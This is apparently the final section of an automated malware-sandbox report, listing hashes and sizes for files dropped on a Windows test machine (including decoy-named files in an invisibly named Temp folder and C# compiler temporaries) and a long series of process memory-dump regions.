                                                                                                                                                          9baf2449f89d1d3acaac02d1124479da4dbed0214d1799d22987009c2406c3ba154324b2d608159ffa6f81e3f8821ad2230417cac1ff68e6eba668d73374b644

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎ ​  ‎​ ‌‏\Common Files\Desktop\OpenReset.jpg

                                                                                                                                                          Filesize

                                                                                                                                                          389KB

                                                                                                                                                          MD5

                                                                                                                                                          38ea56d360a825b0a56e9f819fadc4ac

                                                                                                                                                          SHA1

                                                                                                                                                          22a8d8f8e1bf009983799b30c8a69dc479b6e4cf

                                                                                                                                                          SHA256

                                                                                                                                                          90732db1573442c3e5cf68119544f8296ca551f50413ac9c7d6cf62cf22e8427

                                                                                                                                                          SHA512

                                                                                                                                                          cd25ac4fbaae48a69f8645e5e9871f3c5b47e312e20b7f0b5272c6e2c13052279107d1e1a4b353481e377c6395570e111bb37ff501fcd54a8dfb017026b48748

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎ ​  ‎​ ‌‏\Common Files\Desktop\ReceiveUse.xlsx

                                                                                                                                                          Filesize

                                                                                                                                                          12KB

                                                                                                                                                          MD5

                                                                                                                                                          c65a10583fa2672a6d62d6ad98bd23f2

                                                                                                                                                          SHA1

                                                                                                                                                          81dfd5cc611dfa248c1302424d2dc717faaa671d

                                                                                                                                                          SHA256

                                                                                                                                                          4730057ebf0c934abc5b6b61f68765f7922612366d71701b8f873a608f3ae63a

                                                                                                                                                          SHA512

                                                                                                                                                          c03951174b6187da8e2ab3e7b85fa403b3e8fa3c0c985dbcd5b6a44757c5621cdf4effaf59b8e99949222ab9d4aabb78604113c2f484aa7c4bef383d0e05835f

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\‎ ​  ‎​ ‌‏\Common Files\Documents\CompressConvert.xlsx

                                                                                                                                                          Filesize

                                                                                                                                                          12KB

                                                                                                                                                          MD5

                                                                                                                                                          e71c3cc82c4cb05a49433a9a7149347f

                                                                                                                                                          SHA1

                                                                                                                                                          55bb37d6e06f67d2f0514f5a7da44d695646d739

                                                                                                                                                          SHA256

                                                                                                                                                          0164da2e864c935db19edc9f2aeb104546e6fab3653ad9a6652c502fc96c49b2

                                                                                                                                                          SHA512

                                                                                                                                                          4a01ec8598593fe7a088f96fe25c3c5c31ad401b785752a9e51c0e8135568b4cfb46b4d5fea8b0060f34b8a58bf69920e0fd257d583541aa35eacf0157da6542

                                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\wwfdw5hr\CSC49567EC92E8408782915DF85C1D7494.TMP

                                                                                                                                                          Filesize

                                                                                                                                                          652B

                                                                                                                                                          MD5

                                                                                                                                                          090eec3900497af129df9e39603708a3

                                                                                                                                                          SHA1

                                                                                                                                                          3616f7c8f8556c239af20e978922b2366458853f

                                                                                                                                                          SHA256

                                                                                                                                                          73e22fc1c79eac3f4935ef86bf01d8940be8a300d991230eb4fda3a9449f1b21

                                                                                                                                                          SHA512

                                                                                                                                                          3e66f8e9d13173cac6711bcde12616a76712f995e2b1be303bdc698b0d034fae04caf67f722fcb195f333a79221d133c70d76fa0aacb48bfed6d409a7429bf71

                                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\wwfdw5hr\wwfdw5hr.0.cs

                                                                                                                                                          Filesize

                                                                                                                                                          1004B

                                                                                                                                                          MD5

                                                                                                                                                          c76055a0388b713a1eabe16130684dc3

                                                                                                                                                          SHA1

                                                                                                                                                          ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                                                                          SHA256

                                                                                                                                                          8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                                                                          SHA512

                                                                                                                                                          22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\wwfdw5hr\wwfdw5hr.cmdline

                                                                                                                                                          Filesize

                                                                                                                                                          607B

                                                                                                                                                          MD5

                                                                                                                                                          b001e166634eac2ce1c62b4eb9231db5

                                                                                                                                                          SHA1

                                                                                                                                                          1a5e008c4f7db1e99d3f5374fa170af87a6bcb80

                                                                                                                                                          SHA256

                                                                                                                                                          39c6ad9fd3fc4f0ac71b64f166e822da49b2a79246705eb19aafa9aeb0faaecb

                                                                                                                                                          SHA512

                                                                                                                                                          dd9bf9ee4ee1efafec5cdd26264991a355c4342c4aeede3d633b39a2658bbbc6cdcec586b5604f84656217fab2836e812b9a92cc631ae675afb2986abd5971a4

                                                                                                                                                        • memory/1348-441-0x00007FF9A4E20000-0x00007FF9A4E39000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/1348-562-0x00007FF9A4720000-0x00007FF9A47ED000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          820KB

                                                                                                                                                        • memory/1348-666-0x00007FF995EA0000-0x00007FF996017000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/1348-662-0x00007FF9ACB50000-0x00007FF9ACB5F000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          60KB

                                                                                                                                                        • memory/1348-663-0x00007FF9A4FA0000-0x00007FF9A4FCD000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          180KB

                                                                                                                                                        • memory/1348-667-0x00007FF9A4E20000-0x00007FF9A4E39000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/1348-670-0x00007FF9951C0000-0x00007FF9956E2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/1348-671-0x00007FF9A4DC0000-0x00007FF9A4DD4000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          80KB

                                                                                                                                                        • memory/1348-672-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/1348-673-0x00007FF9A4600000-0x00007FF9A471C000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1348-668-0x00007FF9AB130000-0x00007FF9AB13D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/1348-669-0x00007FF9A4720000-0x00007FF9A47ED000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          820KB

                                                                                                                                                        • memory/1348-664-0x00007FF9A4E70000-0x00007FF9A4E89000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/1348-645-0x00007FF996020000-0x00007FF996609000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/1348-660-0x00007FF9A4DE0000-0x00007FF9A4E13000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          204KB

                                                                                                                                                        • memory/1348-661-0x00007FF9A4FD0000-0x00007FF9A4FF3000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/1348-665-0x00007FF9A4E40000-0x00007FF9A4E63000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/1348-609-0x00007FF996020000-0x00007FF996609000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/1348-610-0x00007FF9A4FD0000-0x00007FF9A4FF3000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/1348-615-0x00007FF995EA0000-0x00007FF996017000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/1348-558-0x00007FF9A4DE0000-0x00007FF9A4E13000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          204KB

                                                                                                                                                        • memory/1348-559-0x00007FF9951C0000-0x00007FF9956E2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/1348-538-0x00007FF9A4E20000-0x00007FF9A4E39000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/1348-518-0x00007FF995EA0000-0x00007FF996017000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/1348-445-0x00007FF9951C0000-0x00007FF9956E2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/1348-448-0x00007FF9A4DC0000-0x00007FF9A4DD4000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          80KB

                                                                                                                                                        • memory/1348-449-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/1348-451-0x00007FF9A4600000-0x00007FF9A471C000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1348-450-0x00007FF9A4E40000-0x00007FF9A4E63000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/1348-446-0x00007FF9A4FD0000-0x00007FF9A4FF3000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/1348-447-0x00007FF9A4720000-0x00007FF9A47ED000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          820KB

                                                                                                                                                        • memory/1348-442-0x00007FF9AB130000-0x00007FF9AB13D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/1348-443-0x00007FF9A4DE0000-0x00007FF9A4E13000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          204KB

                                                                                                                                                        • memory/1348-444-0x00007FF996020000-0x00007FF996609000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/1348-440-0x00007FF995EA0000-0x00007FF996017000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/1348-438-0x00007FF9A4E70000-0x00007FF9A4E89000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/1348-439-0x00007FF9A4E40000-0x00007FF9A4E63000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/1348-437-0x00007FF9A4FA0000-0x00007FF9A4FCD000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          180KB

                                                                                                                                                        • memory/1348-431-0x00007FF9A4FD0000-0x00007FF9A4FF3000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/1348-432-0x00007FF9ACB50000-0x00007FF9ACB5F000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          60KB

                                                                                                                                                        • memory/1348-430-0x00007FF996020000-0x00007FF996609000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/2012-546-0x00000235C9880000-0x00000235C9888000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          32KB

                                                                                                                                                        • memory/3136-148-0x000001FB46AD0000-0x000001FB46AF2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/3548-174-0x0000000000D20000-0x0000000000D29000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          36KB

                                                                                                                                                        • memory/3548-266-0x0000000000D20000-0x0000000000D29000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          36KB

                                                                                                                                                        • memory/4008-227-0x000001A8743C0000-0x000001A8743C8000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          32KB

                                                                                                                                                        • memory/4972-71-0x00007FF995DD0000-0x00007FF9963B9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/4972-405-0x00007FF9A4DC0000-0x00007FF9A4E8D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          820KB

                                                                                                                                                        • memory/4972-401-0x00007FF9A9950000-0x00007FF9A9969000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/4972-65-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/4972-402-0x00007FF9A5060000-0x00007FF9A5083000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-403-0x00007FF995A90000-0x00007FF995C07000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/4972-60-0x00007FF9A5060000-0x00007FF9A5083000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-406-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          204KB

                                                                                                                                                        • memory/4972-407-0x00007FF9A9260000-0x00007FF9A926D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/4972-404-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/4972-382-0x00007FF995DD0000-0x00007FF9963B9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/4972-58-0x00007FF9A9950000-0x00007FF9A9969000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/4972-368-0x00007FF9A8E00000-0x00007FF9A8E23000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-373-0x00007FF995A90000-0x00007FF995C07000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/4972-367-0x00007FF995DD0000-0x00007FF9963B9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/4972-66-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/4972-72-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          204KB

                                                                                                                                                        • memory/4972-75-0x00007FF9A4DC0000-0x00007FF9A4E8D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          820KB

                                                                                                                                                        • memory/4972-74-0x00000214CEC30000-0x00000214CF152000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/4972-73-0x00007FF9951C0000-0x00007FF9956E2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/4972-194-0x00007FF9951C0000-0x00007FF9956E2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/4972-399-0x00007FF9AB130000-0x00007FF9AB13F000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          60KB

                                                                                                                                                        • memory/4972-76-0x00007FF9A8E00000-0x00007FF9A8E23000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-81-0x00007FF9A9260000-0x00007FF9A926D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/4972-398-0x00007FF9A8E00000-0x00007FF9A8E23000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-400-0x00007FF9A5B30000-0x00007FF9A5B5D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          180KB

                                                                                                                                                        • memory/4972-62-0x00007FF995A90000-0x00007FF995C07000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/4972-56-0x00007FF9A5B30000-0x00007FF9A5B5D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          180KB

                                                                                                                                                        • memory/4972-49-0x00007FF9A8E00000-0x00007FF9A8E23000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-50-0x00007FF9AB130000-0x00007FF9AB13F000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          60KB

                                                                                                                                                        • memory/4972-26-0x00007FF995DD0000-0x00007FF9963B9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/4972-397-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/4972-80-0x00007FF9A5B30000-0x00007FF9A5B5D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          180KB

                                                                                                                                                        • memory/4972-79-0x00007FF9A4F90000-0x00007FF9A4FA4000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          80KB

                                                                                                                                                        • memory/4972-268-0x00007FF9A8E00000-0x00007FF9A8E23000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-267-0x00007FF995DD0000-0x00007FF9963B9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.9MB

                                                                                                                                                        • memory/4972-393-0x00007FF9951C0000-0x00007FF9956E2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/4972-247-0x00007FF9A4DC0000-0x00007FF9A4E8D000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          820KB

                                                                                                                                                        • memory/4972-84-0x00007FF9A9950000-0x00007FF9A9969000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/4972-85-0x00007FF9950A0000-0x00007FF9951BC000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/4972-86-0x00007FF9A5060000-0x00007FF9A5083000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4972-394-0x00007FF9A4F90000-0x00007FF9A4FA4000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          80KB

                                                                                                                                                        • memory/4972-211-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          204KB

                                                                                                                                                        • memory/4972-133-0x00007FF995A90000-0x00007FF995C07000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/4972-396-0x00007FF9950A0000-0x00007FF9951BC000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/4972-168-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/4972-212-0x00000214CEC30000-0x00000214CF152000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          5.1MB

                                                                                                                                                        • memory/5004-134-0x00000000007C0000-0x000000000080F000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          316KB

                                                                                                                                                        • memory/5004-302-0x00000000007C0000-0x000000000080F000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          316KB